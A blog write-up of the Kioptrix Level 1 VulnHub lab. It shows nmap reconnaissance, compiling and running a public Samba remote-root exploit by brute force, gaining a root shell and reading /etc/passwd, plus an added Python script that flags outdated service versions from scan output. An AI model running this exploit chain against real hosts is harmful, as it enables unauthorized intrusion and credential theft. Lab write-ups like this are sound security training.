VulnHub lab: Kioptrix Level 1 (VulnHub Boot2Root)

2020/08/29 02:52 · Kioptrix · Original article


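Introduction

Machine URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Description: The Kioptrix VM image is an easy challenge. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to successfully complete the challenge.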

Environment setup

Download the VM image from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Kali: 192.168.2.133

Target: 192.168.2.227

Hands-on penetration test

Scan for the target with nmap

nmap 192.168.2.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 22:38 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0034s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.0047s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0058s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain

Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.00055s latency).
All 1000 scanned ports on zedeMacBook-Pro.lan (192.168.2.120) are closed (720) or filtered (280)

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00068s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0089s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.227
Host is up (0.0023s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

The target's IP is confirmed as 192.168.2.227.

xiaoze@bad:~/下载$ sudo nmap -sS -sV -O -T4 -p- 192.168.2.227
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 23:20 CST
Nmap scan report for 192.168.2.227
Host is up (0.00064s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:50:56:3D:E9:32 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.92 seconds
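
Added example (not part of the original write-up): the -sV scan above gives versions for OpenSSH and Apache but reports Samba only as "Samba smbd", so the Samba finding cannot be read off the scan alone. This sketch parses those service lines and flags software that is below, or cannot be placed against, a fixed-in bound; the function names and status labels are hypothetical, and the 2.2.8 bound is the one in the advisory title this write-up cites.

```python
import re

# Service lines copied from the -sV scan on this page.
SCAN = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
"""
# Fixed-in bound from the advisory title quoted on this page (Samba < 2.2.8).
POLICY = {"samba": "2.2.8"}

LINE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+\S+\s+(.*)$")
MODULE = re.compile(r"([A-Za-z_]\w*)/(\d[\w.]*)")   # e.g. mod_ssl/2.8.4

def components(banner):
    """Return {name: version or None} for software named in one banner."""
    found = {}
    head = re.split(r"[ /]+", banner.split("(")[0].strip())
    if head[0][:1].isalpha():                        # skip bare RPC numbers
        found[head[0].lower()] = head[-1] if head[-1][:1].isdigit() else None
    for name, ver in MODULE.findall(banner):
        found.setdefault(name.lower(), ver)
    return found

def version_key(v):
    """'2.2.7a' -> ((2, 2, 7), 'a'), so versions compare numerically."""
    nums, suffix = re.match(r"(\d+(?:\.\d+)*)(.*)", v).groups()
    return tuple(int(n) for n in nums.split(".")), suffix

def triage(scan, fixed_in):
    """List (port, name, status) for software below a bound or unversioned."""
    findings = []
    for m in filter(None, map(LINE.match, scan.splitlines())):
        port = int(m.group(1))
        for name, ver in components(m.group(2)).items():
            if name in fixed_in and ver is None:
                findings.append((port, name, "version-unknown"))
            elif name in fixed_in and version_key(ver) < version_key(fixed_in[name]):
                findings.append((port, name, "below-bound"))
    return findings

if __name__ == "__main__":
    for port, name, status in triage(SCAN, POLICY):
        print(f"{port}/tcp {name}: {status}")
```

A "version-unknown" result means the banner names the software but not its release, so the host needs an authenticated check or a package inventory before it can be cleared.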

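Nessus scan results (I'm too much of a novice, so I could only rely on Nessus)

This confirmed that Samba is vulnerable. I searched https://www.exploit-db.com/ and found Samba < 2.2.8 (Linux/BSD) - Remote Code Execution.

The download is an XX.c file; compile it with gcc.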

xiaoze@bad:~/下载$ gcc samba.c -o exploit
xiaoze@bad:~/下载$ ll
总用量 92
-rwxr-xr-x 1 xiaoze xiaoze 41256 8月  29 00:11 exploit
-rw-r--r-- 1 xiaoze xiaoze 45115 8月  28 22:24 samba.c
xiaoze@bad:~/下载$ ./exploit 
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./exploit [-bBcCdfprsStv] [host]

-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode

xiaoze@bad:~/下载$ ./exploit -b 0 192.168.2.227
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
pwd
/tmp
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
cat /ver/mail/root
cat: /ver/mail/root: No such file or directory

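Article URL: https://www.ouyangxiaoze.com/2020/08/656.html
Copyright notice: This is an original article; copyright belongs to 欧阳小泽. Sharing is welcome; please retain the source when reposting.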